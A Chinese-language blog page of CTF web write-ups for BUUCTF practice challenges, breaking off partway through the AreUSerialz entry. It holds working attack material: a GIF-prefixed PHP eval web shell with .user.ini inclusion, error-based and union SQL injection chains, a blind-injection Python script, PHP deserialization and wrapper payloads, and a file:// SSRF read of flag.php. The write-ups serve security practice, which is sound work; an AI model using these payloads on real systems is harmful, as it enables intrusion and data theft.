<!DOCTYPE html>
<html lang="zh-cn" color-mode="light">

  <head>
  <meta charset="utf-8">
  <meta name="viewport" content="width=device-width, initial-scale=1" />
  <meta name="keywords" content="" />
  <meta name="author" content="郁涛丶" />
  <meta name="description" content="" />
  
  
  <title>
    
      BUU_WEB刷题_0x10-0x1F 
      
      
      |
    
     郁涛丶&#39;s Blog
  </title>

  
    <link rel="apple-touch-icon" href="/images/favicon.png">
    <link rel="icon" href="/images/favicon.png">
  

  <!-- Raleway-Font -->
  <link href="https://fonts.googleapis.com/css?family=Raleway&display=swap" rel="stylesheet">

  <!-- hexo site css -->
  
<link rel="stylesheet" href="/css/color-scheme.css">
<link rel="stylesheet" href="/css/base.css">
<link rel="stylesheet" href="//at.alicdn.com/t/font_1886449_67xjft27j1l.css">
<link rel="stylesheet" href="/css/github-markdown.css">
<link rel="stylesheet" href="/css/highlight.css">
<link rel="stylesheet" href="/css/comments.css">

  <!-- 代码块风格 -->
  
    
<link rel="stylesheet" href="/css/figcaption/mac-block.css">

  

  <!-- jquery3.3.1 -->
  
    <script defer type="text/javascript" src="/plugins/jquery.min.js"></script>
  

  <!-- fancybox -->
  
    <link href="/plugins/jquery.fancybox.min.css" rel="stylesheet">
    <script defer type="text/javascript" src="/plugins/jquery.fancybox.min.js"></script>
  
  
<script src="/js/fancybox.js"></script>


  

  <script>
    var html = document.documentElement
    const colorMode = localStorage.getItem('color-mode')
    if (colorMode) {
      document.documentElement.setAttribute('color-mode', colorMode)
    }
  </script>
<!-- hexo injector head_end start -->
<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/katex@0.12.0/dist/katex.min.css">

<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/hexo-math@4.0.0/dist/style.css">
<!-- hexo injector head_end end --><meta name="generator" content="Hexo 5.4.0"><link rel="alternate" href="/atom.xml" title="郁涛丶's Blog" type="application/atom+xml">
</head>


  <body>
    <div id="app">
      <div class="header">
  <div class="avatar">
    <a href="/">
      <!-- 头像取消懒加载，添加no-lazy -->
      
        <img src="/images/avatar.png" alt="">
      
    </a>
    <div class="nickname"><a href="/">Ghostasky</a></div>
  </div>
  <div class="navbar">
    <ul>
      
        <li class="nav-item" data-path="/">
          <a href="/">Home</a>
        </li>
      
        <li class="nav-item" data-path="/archives/">
          <a href="/archives/">Archives</a>
        </li>
      
        <li class="nav-item" data-path="/categories/">
          <a href="/categories/">Categories</a>
        </li>
      
        <li class="nav-item" data-path="/tags/">
          <a href="/tags/">Tags</a>
        </li>
      
        <li class="nav-item" data-path="/about/">
          <a href="/about/">About</a>
        </li>
      
    </ul>
  </div>
</div>


<script src="/js/activeNav.js"></script>



      <div class="flex-container">
        <!-- 文章详情页，展示文章具体内容，url形式：https://yoursite/文章标题/ -->
<!-- 同时为「标签tag」，「朋友friend」，「分类categories」，「关于about」页面的承载页面，具体展示取决于page.type -->


    <!-- LaTex Display -->

  
    <script async type="text/javascript" src="https://cdn.jsdelivr.net/npm/mathjax@3/es5/tex-chtml.js"></script>
  
  <script>
    MathJax = {
      tex: {
        inlineMath: [['$', '$'], ['\\(', '\\)']]
      }
    }
  </script>


        
            
                <!-- clipboard -->

  
    <script async type="text/javascript" src="/plugins/clipboard.min.js"></script>
  
  
<script src="/js/codeCopy.js"></script>



                    
                        
                                
                                        
                                                
                                                        
                                                            <!-- 文章内容页 url形式：https://yoursite/文章标题/ -->
                                                            <div class="container post-details" id="post-details">
                                                                <div class="post-content">
                                                                    <div class="post-title">
                                                                        BUU_WEB刷题_0x10-0x1F
                                                                    </div>
                                                                    <div class="post-attach">
                                                                        <span class="post-pubtime">
        <i class="iconfont icon-updatetime" title="Update time"></i>
        2021-05-03
      </span>

                                                                        <span class="post-pubtime"> 本文共4.4k字 </span>

                                                                        <span class="post-pubtime">
        大约需要34min
      </span>

                                                                        
                                                                                    <span class="post-categories">
        <i class="iconfont icon-bookmark" title="Categories"></i>
        
        <span class="span--category">
          <a href="/categories/Technology/" title="Technology">
            <b>#</b> Technology
          </a>
        </span>
                                                                                    
                                                                                        </span>
                                                                                        
                                                                            <span class="post-tags">
        <i class="iconfont icon-tags" title="Tags"></i>
        
        <span class="span--tag">
          <a href="/tags/WEB/" title="WEB">
            <b>#</b> WEB
          </a>
        </span>
                                                                            
                                                                                </span>
                                                                                
                                                                    </div>
                                                                    <div class="markdown-body">
                                                                        <h2 id="0x10-ACTF2020-新生赛-Upload"><a href="#0x10-ACTF2020-新生赛-Upload" class="headerlink" title="0x10.[ACTF2020 新生赛]Upload"></a>0x10.[ACTF2020 新生赛]Upload</h2><p>和之前的一个一样，改个后缀名就OK。</p>
<p><img src="/2021/05/03/BUU-WEB-0x10-0x1F/image-20210417185844946.png" alt="image-20210417185844946"></p>
<h2 id="0x11-ACTF2020-新生赛-BackupFile"><a href="#0x11-ACTF2020-新生赛-BackupFile" class="headerlink" title="0x11.[ACTF2020 新生赛]BackupFile"></a>0x11.[ACTF2020 新生赛]BackupFile</h2><p>可以简单扫下，发现index.php.bak</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="keyword">include_once</span> <span class="string">&quot;flag.php&quot;</span>;</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;key&#x27;</span>])) &#123;</span><br><span class="line">    <span class="variable">$key</span> = <span class="variable">$_GET</span>[<span class="string">&#x27;key&#x27;</span>];</span><br><span class="line">    <span class="keyword">if</span>(!is_numeric(<span class="variable">$key</span>)) &#123;</span><br><span class="line">        <span class="keyword">exit</span>(<span class="string">&quot;Just num!&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="variable">$key</span> = intval(<span class="variable">$key</span>);</span><br><span class="line">    <span class="variable">$str</span> = <span class="string">&quot;123ffwsfwefwf24r2f32ir23jrw923rskfjwtsw54w3&quot;</span>;</span><br><span class="line">    <span class="keyword">if</span>(<span class="variable">$key</span> == <span class="variable">$str</span>) &#123;</span><br><span class="line">        <span class="keyword">echo</span> <span class="variable">$flag</span>;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">else</span> &#123;</span><br><span class="line">    <span class="keyword">echo</span> <span class="string">&quot;Try to find out source file!&quot;</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>str弱相等，被转化为整形</p>
<p>传参key&#x3D;123得到flag</p>
<h2 id="0x12-HCTF-2018-admin"><a href="#0x12-HCTF-2018-admin" class="headerlink" title="0x12.[HCTF 2018]admin"></a>0x12.[HCTF 2018]admin</h2><p>Unicode欺骗：</p>
<p>具体编码可查：<a target="_blank" rel="noopener" href="https://unicode-table.com/en/search/?q=small+capital">https://unicode-table.com/en/search/?q=small+capital</a> </p>
<p>ᴬᴰᴹᴵᴺ</p>
<h2 id="0x13-极客大挑战-2019-BuyFlag"><a href="#0x13-极客大挑战-2019-BuyFlag" class="headerlink" title="0x13.[极客大挑战 2019]BuyFlag"></a>0x13.[极客大挑战 2019]BuyFlag</h2><p>pay的页面中有:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">&lt;!--</span><br><span class="line">	~~~post money and password~~~</span><br><span class="line">if (isset($_POST[&#x27;password&#x27;])) &#123;</span><br><span class="line">	$password = $_POST[&#x27;password&#x27;];</span><br><span class="line">	if (is_numeric($password)) &#123;</span><br><span class="line">		echo &quot;password can&#x27;t be number&lt;/br&gt;&quot;;</span><br><span class="line">	&#125;elseif ($password == 404) &#123;</span><br><span class="line">		echo &quot;Password Right!&lt;/br&gt;&quot;;</span><br><span class="line">	&#125;</span><br><span class="line">&#125;</span><br><span class="line">--&gt;</span><br></pre></td></tr></table></figure>

<p><img src="/2021/05/03/BUU-WEB-0x10-0x1F/image-20210418104024465.png" alt="image-20210418104024465"></p>
<h2 id="0x14-BJDCTF2020-Easy-MD5"><a href="#0x14-BJDCTF2020-Easy-MD5" class="headerlink" title="0x14.[BJDCTF2020]Easy MD5"></a>0x14.[BJDCTF2020]Easy MD5</h2><p>有个hint：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">select * from &#x27;admin&#x27; where password=md5($pass,true)</span><br></pre></td></tr></table></figure>

<p>看了wp之后说是有个ffifdyop，原理是这个字符串被md5哈希了之后会变成276f722736c95d99e921722cf9ed621c，而这歌字符串前几位正好是：’or’6，永为真。</p>
<p><img src="/2021/05/03/BUU-WEB-0x10-0x1F/image-20210418132914216.png" alt="image-20210418132914216"></p>
<p>因此拼接后为，相当于万能密码。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">select * from &#x27;admin&#x27; where password=&#x27;&#x27; or &#x27;6xxxxx&#x27;</span><br></pre></td></tr></table></figure>

<p>之后：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">&lt;!--</span><br><span class="line">$a = $GET[&#x27;a&#x27;];</span><br><span class="line">$b = $_GET[&#x27;b&#x27;];</span><br><span class="line"></span><br><span class="line">if($a != $b &amp;&amp; md5($a) == md5($b))&#123;</span><br><span class="line">    // wow, glzjin wants a girl friend.</span><br><span class="line">--&gt;</span><br></pre></td></tr></table></figure>

<p>这个绕过就有很多方法了，比如<code>php?a[]=1&amp;b[]=2</code>或者构造两组md5值开头为0e的值即可绕过。</p>
<p>在之后：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"> &lt;?php</span><br><span class="line">error_reporting(0);</span><br><span class="line">include &quot;flag.php&quot;;</span><br><span class="line"></span><br><span class="line">highlight_file(__FILE__);</span><br><span class="line"></span><br><span class="line">if($_POST[&#x27;param1&#x27;]!==$_POST[&#x27;param2&#x27;]&amp;&amp;md5($_POST[&#x27;param1&#x27;])===md5($_POST[&#x27;param2&#x27;]))&#123;</span><br><span class="line">    echo $flag;</span><br><span class="line">&#125; </span><br></pre></td></tr></table></figure>

<p>这里把=&#x3D;换成了=&#x3D;&#x3D;，0e大法失效，只能数组绕过。</p>
<h2 id="0x15-SUCTF-2019-CheckIn"><a href="#0x15-SUCTF-2019-CheckIn" class="headerlink" title="0x15.[SUCTF 2019]CheckIn"></a>0x15.[SUCTF 2019]CheckIn</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">GIF89a? &lt;script language=&quot;php&quot;&gt;eval($_REQUEST[shell])&lt;/script&gt;</span><br></pre></td></tr></table></figure>

<p>上传</p>
<p><img src="/2021/05/03/BUU-WEB-0x10-0x1F/image-20210418161338218.png" alt="image-20210418161338218"></p>
<p>本题的重点来了，文件包含漏洞，</p>
<p>user.ini。它比.htaccess用的更广，不管是nginx&#x2F;apache&#x2F;IIS，只要是以fastcgi运行的php都可以用这个方法。可谓很广，不像.htaccess有局限性，只能是apache.</p>
<p>什么是.user.ini？</p>
<p>这得从php.ini说起了，php.ini是php的默认配置文件，这些配置中，分为几种：</p>
<p><img src="/2021/05/03/BUU-WEB-0x10-0x1F/image-20210418161711896.png" alt="image-20210418161711896"></p>
<p>除了主 php.ini 之外，PHP 还会在每个目录下扫描 INI 文件，从被执行的 PHP 文件所在目录开始一直上升到 web 根目录（<code>$_SERVER[&#39;DOCUMENT_ROOT&#39;]</code> 所指定的）。如果被执行的 PHP 文件在 web 根目录之外，则只扫描该目录。</p>
<p>在 <code>.user.ini</code> 风格的 INI 文件中只有具有 PHP_INI_PERDIR 和 PHP_INI_USER 模式的 INI 设置可被识别。</p>
<blockquote>
<p>  <code>.user.ini</code>是一个能被动态加载的ini文件。也就是说我修改了<code>.user.ini</code>后，不需要重启服务器中间件，只需要等待<code>user_ini.cache_ttl</code>所设置的时间（默认为300秒），即可被重新加载。</p>
</blockquote>
<p>要用到的配置：**<code>auto_append_file</code><strong>：</strong>指定一个文件，自动包含在要执行的文件前，类似于在文件前调用了require()函数**</p>
<p>比如：<code>auto_prepend_file=1.gif</code></p>
<p>之后</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">GIF89a? </span><br><span class="line">auto_prepend_file=1.gif`</span><br></pre></td></tr></table></figure>

<p>关于.user.ini的文章：</p>
<p><a target="_blank" rel="noopener" href="https://wooyun.js.org/drops/user.ini%E6%96%87%E4%BB%B6%E6%9E%84%E6%88%90%E7%9A%84PHP%E5%90%8E%E9%97%A8.html">https://wooyun.js.org/drops/user.ini%E6%96%87%E4%BB%B6%E6%9E%84%E6%88%90%E7%9A%84PHP%E5%90%8E%E9%97%A8.html</a></p>
<h2 id="0x16-ZJCTF-2019-NiZhuanSiWei"><a href="#0x16-ZJCTF-2019-NiZhuanSiWei" class="headerlink" title="0x16.[ZJCTF 2019]NiZhuanSiWei"></a>0x16.[ZJCTF 2019]NiZhuanSiWei</h2><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span>  </span><br><span class="line"><span class="variable">$text</span> = <span class="variable">$_GET</span>[<span class="string">&quot;text&quot;</span>];</span><br><span class="line"><span class="variable">$file</span> = <span class="variable">$_GET</span>[<span class="string">&quot;file&quot;</span>];</span><br><span class="line"><span class="variable">$password</span> = <span class="variable">$_GET</span>[<span class="string">&quot;password&quot;</span>];</span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$text</span>)&amp;&amp;(file_get_contents(<span class="variable">$text</span>,<span class="string">&#x27;r&#x27;</span>)===<span class="string">&quot;welcome to the zjctf&quot;</span>))&#123;</span><br><span class="line">    <span class="keyword">echo</span> <span class="string">&quot;&lt;br&gt;&lt;h1&gt;&quot;</span>.file_get_contents(<span class="variable">$text</span>,<span class="string">&#x27;r&#x27;</span>).<span class="string">&quot;&lt;/h1&gt;&lt;/br&gt;&quot;</span>;</span><br><span class="line">    <span class="keyword">if</span>(preg_match(<span class="string">&quot;/flag/&quot;</span>,<span class="variable">$file</span>))&#123;</span><br><span class="line">        <span class="keyword">echo</span> <span class="string">&quot;Not now!&quot;</span>;</span><br><span class="line">        <span class="keyword">exit</span>(); </span><br><span class="line">    &#125;<span class="keyword">else</span>&#123;</span><br><span class="line">        <span class="keyword">include</span>(<span class="variable">$file</span>);  <span class="comment">//useless.php</span></span><br><span class="line">        <span class="variable">$password</span> = unserialize(<span class="variable">$password</span>);</span><br><span class="line">        <span class="keyword">echo</span> <span class="variable">$password</span>;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">else</span>&#123;</span><br><span class="line">    highlight_file(<span class="keyword">__FILE__</span>);</span><br><span class="line">&#125;</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>知识点：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">data伪协议写入文件</span><br><span class="line">php://filter用于读取源码</span><br><span class="line">php://input用于执行PHP的代码</span><br></pre></td></tr></table></figure>

<p>首先：</p>
<p><code>if(isset($text)&amp;&amp;(file_get_contents($text,&#39;r&#39;)===&quot;welcome to the zjctf&quot;)</code></p>
<p>data协议通常是用来执行PHP代码，然而我们也可以将内容写入data协议中然后让file_get_contents函数取读取。构造如下：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">text=data://text/plain;base64,d2VsY29tZSB0byB0aGUgempjdGY=</span><br></pre></td></tr></table></figure>

<p>当然也可以不需要base64，但是一般为了绕过某些过滤都会用到base64。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">data://text/plain,welcome to the zjctf</span><br></pre></td></tr></table></figure>

<p>接下来是file:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">file=php://filter/read=convert.base64-encode/resource=useless.php</span><br></pre></td></tr></table></figure>

<p>得到：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php  </span><br><span class="line">class Flag&#123;  //flag.php  </span><br><span class="line">    public $file;  </span><br><span class="line">    public function __tostring()&#123;  </span><br><span class="line">        if(isset($this-&gt;file))&#123;  </span><br><span class="line">            echo file_get_contents($this-&gt;file); </span><br><span class="line">            echo &quot;&lt;br&gt;&quot;;</span><br><span class="line">        return (&quot;U R SO CLOSE !///COME ON PLZ&quot;);</span><br><span class="line">        &#125;  </span><br><span class="line">    &#125;  </span><br><span class="line">&#125;  </span><br><span class="line">?&gt;  </span><br></pre></td></tr></table></figure>

<p>参考反序列化基础的文章：<a target="_blank" rel="noopener" href="https://www.freebuf.com/articles/web/167721.html">https://www.freebuf.com/articles/web/167721.html</a></p>
<p>构造：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">O:4:&quot;Flag&quot;:1:&#123;s:4:&quot;file&quot;;s:8:&quot;flag.php&quot;&#125;</span><br></pre></td></tr></table></figure>

<p>最终payload：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?text=data://text/plain;base64,d2VsY29tZSB0byB0aGUgempjdGY=&amp;file=useless.php&amp;password=O:4:&quot;Flag&quot;:1:&#123;s:4:&quot;file&quot;;s:8:&quot;flag.php&quot;;&#125;</span><br></pre></td></tr></table></figure>

<h2 id="0x17-极客大挑战-2019-HardSQL"><a href="#0x17-极客大挑战-2019-HardSQL" class="headerlink" title="0x17.[极客大挑战 2019]HardSQL"></a>0x17.[极客大挑战 2019]HardSQL</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">&#x27;or(updatexml(1,concat(0x7e,(SELECT(database())),0x7e),1))%23</span><br><span class="line">得到数据库geek</span><br><span class="line"></span><br><span class="line">&#x27;or(updatexml(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema)like(&#x27;geek&#x27;)),0x7e),1))%23</span><br><span class="line">得到表名：H4rDsq1</span><br><span class="line"></span><br><span class="line">or(updatexml(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_name)like(&#x27;H4rDsq1&#x27;)),0x7e),1))%23</span><br><span class="line">得到字段：id,username,password</span><br><span class="line"></span><br><span class="line">查数据：</span><br><span class="line">or(updatexml(1,concat(0x7e,(select(group_concat(id,username,password))from(H4rDsq1)),0x7e),1))%23</span><br><span class="line">只查到了一半：XPATH syntax error: &#x27;~1flagflag&#123;b615ddd5-228b-4383-9a&#x27;</span><br><span class="line">可以使用right()语句：</span><br><span class="line">or(updatexml(1,concat(0x7e,(select(group_concat(right(password,30)))from(H4rDsq1)),0x7e),1))%23</span><br></pre></td></tr></table></figure>

<h2 id="0x18-CISCN2019-华北赛区-Day2-Web1-Hack-World"><a href="#0x18-CISCN2019-华北赛区-Day2-Web1-Hack-World" class="headerlink" title="0x18.[CISCN2019 华北赛区 Day2 Web1]Hack World"></a>0x18.[CISCN2019 华北赛区 Day2 Web1]Hack World</h2><p>找个字典跑了一下，过滤了一些，有些没过滤。</p>
<p>布尔盲注：</p>
<p>用的网上的脚本：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> requests</span><br><span class="line">url = <span class="string">&quot;http://07113360-9eb3-4e8d-8085-4284220b1372.node3.buuoj.cn/index.php&quot;</span></span><br><span class="line">res = <span class="string">&quot;&quot;</span></span><br><span class="line"><span class="keyword">try</span>:</span><br><span class="line">    <span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">1</span>, <span class="number">50</span>):</span><br><span class="line">        <span class="keyword">for</span> j <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">22</span>, <span class="number">127</span>):</span><br><span class="line">            payload = <span class="string">&quot;1^if((ascii(substr((select(flag)from(flag)),%d,1))=%d),0,1)&quot;</span> % (i, j)</span><br><span class="line">            <span class="comment">#或者：0^(ascii(substr((select(flag)from(flag)),%d,1))=%d)</span></span><br><span class="line">            data = &#123;<span class="string">&quot;id&quot;</span>: payload&#125;</span><br><span class="line">            r = requests.post(url, data)</span><br><span class="line">            <span class="comment">#print(payload)</span></span><br><span class="line">            <span class="keyword">if</span> <span class="string">&quot;Hello, glzjin wants a girlfriend.&quot;</span> <span class="keyword">in</span> r.text:</span><br><span class="line">                <span class="comment">#res += (chr(j))</span></span><br><span class="line">                <span class="built_in">print</span>(i,<span class="built_in">chr</span>(j))</span><br><span class="line">                <span class="keyword">break</span></span><br><span class="line"><span class="keyword">except</span>:</span><br><span class="line">    <span class="built_in">print</span>(<span class="string">&quot;end ....&quot;</span>)</span><br><span class="line"></span><br><span class="line"><span class="built_in">print</span>(res)</span><br></pre></td></tr></table></figure>

<p>其中，异或的^可以起到or的作用</p>
<p>因为每次跑的时候会漏掉一些，所以将每个都输出，然后将缺少的在打印。</p>
<h2 id="0x19-网鼎杯-2018-Fakebook"><a href="#0x19-网鼎杯-2018-Fakebook" class="headerlink" title="0x19.[网鼎杯 2018]Fakebook"></a>0x19.[网鼎杯 2018]Fakebook</h2><p>robots.txt有源码泄露</p>
<p>可能与ssrf有关</p>
<p>登陆后有SQL注入，对空格有过滤，可以报错注入或者&#x2F;**&#x2F;代替空格：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">?no=-1 or updatexml(1,concat(&#x27;\~&#x27;,database(),&#x27;\~&#x27;),1)#</span><br><span class="line">数据库名：fakebook </span><br><span class="line"></span><br><span class="line">no=11/**/union/**/select/**/1,group_concat(table_name),3,4/**/from/**/information_schema.tables where table_schema=&#x27;fakebook&#x27; #</span><br><span class="line">表名：users</span><br><span class="line"></span><br><span class="line">no=11/**/union/**/select/**/1,group_concat(column_name),3,4/**/from/**/information_schema.columns where table_schema=&#x27;fakebook&#x27;and table_name=&#x27;users&#x27; #</span><br><span class="line">字段：no,username,passwd,data </span><br><span class="line"></span><br><span class="line">之后返回的是：</span><br><span class="line">O:8:&quot;UserInfo&quot;:3:&#123;s:4:&quot;name&quot;;s:6:&quot;123123&quot;;s:3:&quot;age&quot;;i:0;s:4:&quot;blog&quot;;s:13:&quot;www.baidu.com&quot;;&#125; </span><br></pre></td></tr></table></figure>

<p><img src="/2021/05/03/BUU-WEB-0x10-0x1F/image-20210503165820953.png" alt="image-20210503165820953"></p>
<p>那么进行反序列化：</p>
<p><img src="/2021/05/03/BUU-WEB-0x10-0x1F/image-20210503170124576.png" alt="image-20210503170124576"></p>
<p>因为blog是在data，所以：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">no=-1/**/union/**/select/**/1,2,3,&#x27;O:8:&quot;UserInfo&quot;:3:&#123;s:4:&quot;name&quot;;s:0:&quot;&quot;;s:3:&quot;age&quot;;i:0;s:4:&quot;blog&quot;;s:29:&quot;file:///var/www/html/flag.php&quot;;&#125;&#x27;</span><br></pre></td></tr></table></figure>

<p>源码中有flag。</p>
<h2 id="0x1A-GXYCTF2019-BabySQli"><a href="#0x1A-GXYCTF2019-BabySQli" class="headerlink" title="0x1A.[GXYCTF2019]BabySQli"></a>0x1A.[GXYCTF2019]BabySQli</h2><p>考点：联合注入添加临时虚拟用户</p>
<p>随便输入后看源码，</p>
<blockquote>
<p>  MMZFM422K5HDASKDN5TVU3SKOZRFGQRRMMZFM6KJJBSG6WSYJJWESSCWPJNFQSTVLFLTC3CJIQYGOSTZKJ2VSVZRNRFHOPJ5</p>
</blockquote>
<p>先base32，之后是64</p>
<blockquote>
<p>  select * from user where username &#x3D; ‘$name’</p>
</blockquote>
<p>测试了下是3个字段：</p>
<blockquote>
<p>  union select 1,2,3</p>
</blockquote>
<p>当username不是admin的时候报错wrong user，否则报wrong password</p>
<p>将’admin’放在2的位置上报王蓉 password</p>
<blockquote>
<p>  union select 1,’admin’,3</p>
</blockquote>
<p>mysql当联合查询时，没有的话会在数据库中加入临时的</p>
<img src="/2021/05/03/BUU-WEB-0x10-0x1F/image-20210503174156981.png" alt="image-20210503174156981" style="zoom:50%;">

<p>(实际上应该不用猜，应该是个坑，原题应该有提示密码是md5加密储存的)</p>
<p>猜测语句是这样的:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php$row;</span><br><span class="line">$pass=$_POST[&#x27;pw&#x27;];</span><br><span class="line">if($row[&#x27;username&#x27;]==’admin’)&#123;</span><br><span class="line">if($row[&#x27;password&#x27;]==md5($pass))&#123; </span><br><span class="line">echo $flag; </span><br><span class="line">&#125;else&#123; echo “wrong pass!”; </span><br><span class="line">&#125;&#125;</span><br><span class="line">else&#123; echo “wrong user!”;&#125;</span><br></pre></td></tr></table></figure>

<p>那么可以这样构造：123的md5：202cb962ac59075b964b07152d234b70</p>
<p>于是：adf’union select 1,’admin’,’202cb962ac59075b964b07152d234b70’</p>
<p>pwd为123</p>
<h2 id="0x1B-网鼎杯-2020-青龙组-AreUSerialz"><a href="#0x1B-网鼎杯-2020-青龙组-AreUSerialz" class="headerlink" title="0x1B.[网鼎杯 2020 青龙组]AreUSerialz"></a>0x1B.[网鼎杯 2020 青龙组]AreUSerialz</h2><p>看了wp才做出来的，确实感觉这道题挺有意思。</p>
<p>首先get传str，每个字符要在32到125之间，之后反序列化。</p>
<p>反序列化时用了__destruct方法：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">__destruct</span>(<span class="params"></span>) </span>&#123;</span><br><span class="line">    <span class="keyword">if</span>(<span class="keyword">$this</span>-&gt;op === <span class="string">&quot;2&quot;</span>)</span><br><span class="line">        <span class="keyword">$this</span>-&gt;op = <span class="string">&quot;1&quot;</span>;</span><br><span class="line">    <span class="keyword">$this</span>-&gt;content = <span class="string">&quot;&quot;</span>;</span><br><span class="line">    <span class="keyword">$this</span>-&gt;process();</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>如果op为2，赋值为1，溶蚀content赋为空，再之后执行process，这里op与2比较是强比较。</p>
